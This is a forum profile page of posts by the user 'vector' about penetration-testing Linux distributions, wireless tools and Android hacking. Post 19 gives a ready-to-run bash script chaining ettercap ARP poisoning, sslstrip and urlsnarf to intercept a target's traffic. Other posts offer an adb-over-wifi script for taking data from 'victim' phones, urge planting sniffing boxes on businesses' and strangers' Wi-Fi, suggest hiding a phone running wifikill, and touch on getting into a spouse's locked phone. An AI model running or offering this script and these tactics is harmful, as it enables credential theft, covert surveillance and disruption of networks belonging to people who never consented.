Jump to content

vector

Dedicated Members
  • Posts

    614
  • Joined

  • Last visited

  • Days Won

    2

Everything posted by vector

  1. um ok just to clarify here, linux, and Backtrack5? Redundant statement is redundant. Backtrack5 IS linux. Alot of people say they dont recommend using backtrack5 as an installed operating system or as a main operating system.... I dont see why not, as long as youre not running around as root all the time. and sure you can just install something like ubuntu and just add the backtrack repositories if you wanted as well. the latest backtrack5 r3 and pentest distros like backbox have leaned out the amount of pentest apps installed and kept it simple with the latest and most used apps. if you want a nice complete pentest distro with a shitload of pentest apps (some are pretty redundant and kind of obsolete) to play around with and lean about then try blackbuntu. still one of my fav distros. but i mean when you really look at it backtrack, backbox, blackbuntu are all penetration distros that are really just Ubuntu with with a twist, and some extra repositories. so really the choice is up to you. good advice is to try them all either live disk or vm, and when youre ready, make the switch.
  2. you might as well not even bother with virtualbox, the latest virtualbox doesnt yet support usb 3.0. vmware player on the other hand does. you dont need the whole workstation, just download and install vmware player latest version 5.0.1. bt5 r3 is fine as well as it has kernel 3.2.x. what you need to do is configure the hardware settings when you create the new virtual machine from the bt5 .iso heres a screen shot of how it will look https://www.box.com/s/s4aygylupsjvxwh3usgj https://www.box.com/s/23p38psjzu2fiv5iz8bp then you should be good to go. out of curiosity what OS is the host system?
  3. i dont have any issues with backbox booting from micro or full size sd cards. what method are you using to write the iso to the sdcards? format your sdcard then try using startup disk creator to write the backbox iso to the device of your choice, then of course setup your bios to boot from it. it simplifies the whole process for you.
  4. ok so what external devices exactly are you trying to connect to your androids? i took a look at the cable youre talking about. its used for adb connections and they even have a link with some handy little scripts to jack data from the victims device, such as images from the /sdcard/DCIM/ directory or copy all the app cache data, browsing history, etc etc. anything you can do via ./adb basically. there should be a nice little script that will enable adb over wifi for rooted victims so you can connect real quick with the OTG cable run something like #!/system/bin/sh setprop service.adb.tcp.port 5555 stop adbd start adbd or have it edit the init script to enable it on every boot so you can ./adb jack datas from the victim anytime you want over wlan connections. i'm not sure this cable is what you thought it was.
  5. explain what you mean by "disconnects" where exactly is the disconnect happening? what does your setup consist of? what type of wireless adapter, router, OS, router firmware, etc etc. give some specifics or youll never find a solution here.
  6. first you need to start by learning the difference between promisc mode and monitor mode, and what each modes capabilities, and uses are.
  7. um basically whatever tools you want to use. ive been using backbox on one of my netbooks for a couple weeks now, and i like it just fine. its not bloated down with tons of pentest tools that youll likely never use. just gets right to the good shit. i gotta say though im still partial to blackbuntu. still my fav. but backbox is a nice lean well done distro. theres nothing stopping you from installng any tool that you want. if youre not sure which tools to add then you probably dont need to use them. alot of apps on other distros can get sorta redundant and do the same thing just look different.
  8. runnig if you insist on not running xserver and doing everything from tty why dont you use wicd-cli or wicd-curses to manage your connection settings instead of dickin around with iw and wireless-tools.
  9. you probably need to install libopenssl-ruby, also for beef you will need to make sure you have libsqlite3-dev and sqlite3.
  10. yeah youre talking about NoCat, NoCatAuth, NoCatSplash , etc etc. it shouldnt be a problem to run on any accesspoint running linux.
  11. lol ok seriously, you cant expect to get any help when you say " i get like a 404 error or something error i forget" if you really want help then give specific detailsmpf what youre trying to do, what yove done already, what EXACT errors youre getting , and details of your hardware/software setup. then maybe you'll get a fix
  12. yeah the OP left me a little confused as well. i'm not sure what youre asking to do exactly, and who needs help doing what. all i really got was that you have a marrid3 friend that has a blocked lg phone that he purchased and that his wife uses and he wants to check up on that little teamps activties. it sounds like she has some type of screen lock password/pin/guesture set on it and he just wants to be able and look at the gppds on thr device. but cant. anyways, maybe you can be a little more specific and claify exactly what you need.
  13. yeah theres even a great little routerpwn android app as well.
  14. vector

    Deauth All

    yes that is wifite. i use wifite on the reg. its one of my favorite tools. if you want to use the wps cracking features you will also need to install reaver. and wifite will suggest pyrit, tshark, and cowpatty, but arent required. i even have wifite,reaver,aircrack-ng working with my hp touchpad tablet and my asus tf101 android tablet for mobile owning. some screenshots here. https://www.box.com/s/4xriiwm6ycdkl00xfqxo https://www.box.com/s/tlzfwhelg1g5fhm5xd2o https://www.box.com/s/pvf0x6zqhn861owi9xmj https://www.box.com/s/hpupfnzolgtgztgznp81
  15. wigle wifi wardriving app is going to be a little closer to what youre looking for. it has speech settings as well as sound settings for different types of notifications. https://www.box.com/shared/t2glqoth066htilhl824 https://www.box.com/s/27s3e7gda1e42mfv1gae https://www.box.com/s/s6lkpbrls1spkm8d8df0
  16. vector

    Deauth All

    a real easy way to have some fun is with an old android phone thats just layin around. if you dont have one then get one from someone, root it, and have fun with a nice little app called wifikill. it is exactly what you are looking for and you can plug the phone in and hide it anywhere and just let it run all the time.
  17. vector

    Which Android?

    ok first of all you need to specify which S3 device youre talking about, and which nexus device. there are probably about 15+ nexus devices and about as many S3 devices. you need to compare specs to specs. saying "S3 has better hardware than nexus" doesnt make any sense. theres are samsung nexus devices, asus nexus devices, LG nexus devices, and HTC nexus devices. what exactly is it that you want from your device? answer that, then you can pick the device for you.
  18. basically to answer your question, the answer is yes. aircrack-ng will work perfectly on pretty much any android device. as well as other tools like wifite and reaver. in order to make this happen you need to chroot into a linux img that you have on your device or your devices memory card. currently you can use ubuntu 10, ubuntu 12, backtrack 5, Debian, arch linux Fedora 17, and openSUSE, probably others as well, but these are the ones that ive tried so far. however getting monitor/injection to work with your devices internal wifi chipset isnt likely yet. what you'll need to do is compile and install drivers for a usb adapter in chroot. if you dont know how to do that then this isnt for you. after you get the driver/modules compiled then you can install wicd-curses (or wicd-cli if you prefer), wpasupplicant, and dbus, plus any of their dependencies. disable the internal wireless card that android uses. insmod your modules for the usb wireless adapter. start dbus and wicd /etc/init.d/dbus start ; /etc/init.d/wicd start run wicd-curses (or wicd-cli) refresh the network list and you can now connect via the usb adapter, or you can start using tools like reaver, wifite, aircrack-ng etc assuming you have them installed. i do this with a couple of my tablets, hp touchpad is one of them, with an OTG cable and external batterypack to power the usb adapter, also my asus tf101, my old htc evo 4g and a couple of my mk802's. if youre looking for a point and click aircrack then dont hold your breath. but if you have a little know how and a few min, you can have a nice little mobile wireless pwn device. here are some screen shots from my hp touchpad https://www.box.com/...6zqhn861owi9xmj https://www.box.com/...helg1g5fhm5xd2o https://www.box.com/...wm6ycdkl00xfqxo https://www.box.com/...nzolgtgztgznp81
  19. ok if you want this to be really easy. make sure you have , ettercap (not ettercap-gtk, just the text only version), urlsnarf, and tcpxtract, installed. heres a handy little script that you can just run as root that will setup everything for you. of course you will have to fill in a few blanks that it will ask for, such as gateway/target ip addy, and wether you want to run wireshark and or extract images when your session is done. #!/bin/bash echo -n "Do you want to execute Wireshark when done? If yes, LEAVE BLANK " read -e NOYES echo -n "Do you want to extract pictures from the pcap via tcpxtract? If yes, LEAVE BLANK " read -e XTRACT echo -n "What interface to use? ie wlan0: " read -e IFACE echo -n "Name of "Session"? (name of the folder that will be created with all the log files): " read -e SESSION echo -n "Gateway IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: " read -e ROUTER echo -n "Target IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: " read -e VICTIM mkdir /root/$SESSION/ iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain sslstrip -p -k -w /root/$SESSION/$SESSION.log & iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 urlsnarf -i $IFACE | grep http > /root/$SESSION/$SESSION.txt & ettercap -T -i $IFACE -w /root/$SESSION/$SESSION.pcap -L /root/$SESSION/$SESSION -M arp /$ROUTER/ /$VICTIM/ "$XTRACT"tcpxtract -f /root/$SESSION/$SESSION.pcap "$NOYES"wireshark & killall sslstrip killall python killall urlsnarf iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain etterlog -p -i /root/$SESSION/$SESSION.eci [/CODE]
  20. set it up as a little jackbox and leave it on other peoples wifis, small businesses around town, public hotspots, etc. just let it run ssltrip and collect the goodies. what would be really nice is a tablet with a wireless chipset supporting monitor mode. then it would be game over. then you could just leave it to reaver, or pwn weps anywhere.
  21. vector

    Which Laptop?

    I like to get mine from oxfordtec.com
  22. I'm not sure what you mean by cheap hardware, but I have a peplink multiwan router that I use for connecting 4 of my neighbors wlans into one fat pipe using wrt's in client mode. Of course you don"t have to use the wrts unless you want to go wireless but you might want to check out what peplink has avail or see if you can pickup a cheaper used one.
×
×
  • Create New...